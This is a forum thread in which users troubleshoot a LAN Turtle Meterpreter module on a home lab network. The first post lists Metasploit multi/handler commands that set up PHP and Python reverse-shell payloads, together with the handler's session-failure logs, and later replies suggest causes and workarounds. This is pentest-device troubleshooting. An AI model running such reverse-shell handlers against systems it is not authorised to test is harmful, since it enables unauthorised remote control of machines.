Jump to content

Meterpreter module issue


F0X4C1D

Recommended Posts

Hello,

It's going to be two days that I try to operate my meterpreter module for my LAN Turtle but so far unsuccessfully. In short my network configuration: my kali linux machine 10.10.10.118, my lan turtle 10.10.10.117.

I followed meticulously the video tutorial from Darren here with some prerequisites regardings the metasploit database.

msfdb init
service postgresql start
service postgresql status
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.10.10.118
set LPORT 4444
set ExitOnSession false
show options
exploit -j

And I got the error below:

msf6 exploit(multi/handler) > [*] Sending stage (39282 bytes) to 10.10.10.117
[-] Meterpreter session 1 is not valid and will be closed
[*]  - Meterpreter session 1 closed.
[*] Sending stage (39282 bytes) to 10.10.10.117
[-] Meterpreter session 2 is not valid and will be closed
[*]  - Meterpreter session 2 closed.
[*] Sending stage (39282 bytes) to 10.10.10.117
[-] Meterpreter session 3 is not valid and will be closed
[*]  - Meterpreter session 3 closed.
[*] Sending stage (39282 bytes) to 10.10.10.117
[-] Meterpreter session 4 is not valid and will be closed
[*]  - Meterpreter session 4 closed.
[*] Sending stage (39282 bytes) to 10.10.10.117

I know this tutorial is a little outdated (2017) and the paypload suggested by the module (Help section) is slightly different... so I followed this tutorial.

use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_https
set SessionExpirationTimeout 604800
set LHOST 10.10.10.118
set LPORT 4444
set ExitOnSession false
show options
exploit -j

And I got the error below:

msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://10.10.10.118:4444
[*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39568 bytes) ...
[*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39528 bytes) ...
[*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39540 bytes) ...
[-] Meterpreter session 1 is not valid and will be closed
[*]  - Meterpreter session 1 closed.
[*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39548 bytes) ...
[-] Meterpreter session 2 is not valid and will be closed
[*]  - Meterpreter session 2 closed.
[*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39580 bytes) ...
[*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39604 bytes) ...
[-] Meterpreter session 3 is not valid and will be closed
[*]  - Meterpreter session 3 closed.
[*] https://10.10.10.118:4444 handling request from 10.10.10.117; (UUID: womnpkkv) Staging python payload (39596 bytes) ...
[-] Meterpreter session 4 is not valid and will be closed
[*]  - Meterpreter session 4 closed.

When in doubt, I setup a new Kali Linux VM (kali-linux-2021.1-vbox-amd64.ova) to start from scratch, and this time, when I configure to use the payload python/meterpreter/reverse_https, I got this:

 

Link to comment
Share on other sites

  • 3 months later...

Hello,

i've got exactly the same problem.

The Help section in my Turtle told me to use the python/meterpreter/reverse_https. I've done it ! But don't work ! like you.

I have tryed all the payloads  with reverse_https.

I can note than when the module is stopped and disabled, my device continue to receive staging(infinite) ?!? And i have to delete the module to stop it !

I've try to reboot the turtle and flash it, but nothing work.

Have you resolved the problem or getting an information since august ?

Thanks

Link to comment
Share on other sites

Could be a client side (Turtle) issue, or host side. A bit difficult to say without digging deeper into it. When running the Python based shell component manually on the Turtle, it reports "Unable to connect" even though the Meterpreter host reacts. The dynamically generated URL on the client side doesn't seem to be accepted by the Meterpreter host.

Link to comment
Share on other sites

  • 1 month later...

I've come to the conclusion that it's easier (and more related to success) to run a staged payload/binary on the Turtle to get a Meterpreter shell. Note though that this probably requires the later variant of the Turtle with an SD card slot. The older version of the Turtle doesn't have enough storage space to host the payload (at least a linux/mipsbe based binary).

Link to comment
Share on other sites

  • 2 months later...
  • 1 year later...

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...